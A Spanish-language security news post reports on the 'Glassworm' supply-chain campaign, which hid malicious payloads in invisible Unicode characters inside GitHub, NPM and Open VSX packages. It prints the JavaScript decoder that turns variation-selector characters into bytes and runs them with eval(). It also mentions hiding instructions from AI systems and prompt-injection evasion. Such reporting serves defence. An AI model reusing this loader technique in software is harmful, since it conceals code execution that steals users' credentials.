El ataque de cadena de suministro utiliza código Unicode invisible para evadir la detección.

✍️ OpenClawRadar📅 Publicado: 15 de marzo de 2026🔗 Source
El ataque de cadena de suministro utiliza código Unicode invisible para evadir la detección.
Ad

Investigadores de seguridad de Aikido Security descubrieron un ataque de cadena de suministro que utiliza código Unicode invisible para ocultar funciones maliciosas en paquetes subidos a GitHub, NPM y Open VSX. El grupo atacante, apodado Glassworm, subió 151 paquetes maliciosos a GitHub del 3 al 9 de marzo de 2026.

Cómo funciona el código invisible

Los paquetes maliciosos utilizan caracteres Unicode de Áreas de Uso Público (también llamadas Acceso de Uso Público) que son invisibles cuando se visualizan en editores, terminales e interfaces de revisión de código. Aunque la mayor parte del código parece normal, las funciones y cargas útiles maliciosas se representan usando estos caracteres invisibles, lo que hace ineficaces las revisiones manuales de código y las defensas tradicionales.

Los caracteres Unicode invisibles representan cada letra del alfabeto estadounidense cuando son procesados por computadoras, pero se muestran como espacios en blanco o líneas vacías para los humanos. Los intérpretes de JavaScript pueden leer y ejecutar estos caracteres como código normal.

Implementación técnica

En un paquete analizado, los atacantes codificaron una carga útil maliciosa usando caracteres invisibles. El código incluye una función decodificadora que extrae los bytes ocultos y los pasa a eval():

const s = v => [...v].map(
  w => (
    w = w.codePointAt(0),
    w >= 0xFE00 && w <= 0xFE0F ? w - 0xFE00 :
    w >= 0xE0100 && w <= 0xE01EF ? w - 0xE0100 + 16 :
    null
  )
).filter(n => n !== null);
eval(Buffer.from(s(``)).toString('utf-8'));

La cadena de comillas invertidas pasada a s() parece vacía en los visores, pero contiene caracteres invisibles que se decodifican en una carga útil maliciosa completa. En incidentes anteriores, las cargas útiles decodificadas obtenían y ejecutaban scripts de segunda etapa usando Solana como canal de entrega para robar tokens, credenciales y secretos.

Ad

Características del ataque

Los paquetes maliciosos son particularmente difíciles de detectar porque:

  • Las porciones visibles del código son de alta calidad y realistas
  • Los cambios circundantes incluyen ajustes en la documentación, incrementos de versión, pequeñas refactorizaciones y correcciones de errores
  • Los cambios son estilísticamente consistentes con los proyectos objetivo
  • Los investigadores sospechan que se utilizan LLM para generar paquetes convincentemente legítimos

Esta técnica Unicode se utilizó por primera vez en 2024 para ocultar instrucciones maliciosas alimentadas a motores de IA, y desde entonces se ha adaptado para ataques de malware tradicionales. Los 151 paquetes detectados probablemente representan una pequeña fracción de la campaña, ya que muchos han sido eliminados desde la carga inicial.

📖 Leer la fuente completa: HN AI Agents

Ad

👀 Ver también

arifOS: Un núcleo de gobernanza MCP de $15 millones para la seguridad de la herramienta OpenClaw
Seguridad

arifOS: Un núcleo de gobernanza MCP de $15 millones para la seguridad de la herramienta OpenClaw

arifOS es un servidor MCP ligero que intercepta las llamadas a herramientas de OpenClaw, las puntúa de 000 a 999 y bloquea acciones inseguras con 13 pisos de seguridad duros antes de que lleguen a sistemas de archivos, APIs o bases de datos.

OpenClawRadar
Usuario de OpenClaw Comparte Estrategia para Equilibrar la Autonomía del Agente y la Seguridad Web
Seguridad

Usuario de OpenClaw Comparte Estrategia para Equilibrar la Autonomía del Agente y la Seguridad Web

Un usuario de OpenClaw describe su desafío actual: equilibrar la autonomía del agente con la seguridad, especialmente en lo que respecta al acceso web y los riesgos de inyección de comandos. Proponen una solución que utiliza segmentos de agentes de 'baja confianza' y 'alta confianza' con una puerta de aprobación humana.

OpenClawRadar
ClawSecure: Plataforma de Seguridad para el Ecosistema OpenClaw con Auditoría de 3 Capas y Monitoreo en Tiempo Real
Seguridad

ClawSecure: Plataforma de Seguridad para el Ecosistema OpenClaw con Auditoría de 3 Capas y Monitoreo en Tiempo Real

ClawSecure es una plataforma de seguridad dedicada para OpenClaw que realiza auditorías de seguridad de 3 capas, monitoreo en tiempo real con seguimiento de hash SHA-256 cada 12 horas, y proporciona cobertura completa de OWASP ASI. Ha auditado más de 3,000 habilidades populares y es de uso gratuito sin necesidad de registro.

OpenClawRadar
Ataques de Inyección Camuflados en el Dominio Eluden Detectores en Sistemas LLM Multiagente
Seguridad

Ataques de Inyección Camuflados en el Dominio Eluden Detectores en Sistemas LLM Multiagente

Un nuevo estudio muestra que los payloads de inyección adaptados al vocabulario del dominio evaden la detección, reduciendo la IDR del 93,8% al 9,7%. El debate multiagente amplifica los ataques. Llama Guard 3 no detecta ningún payload.

OpenClawRadar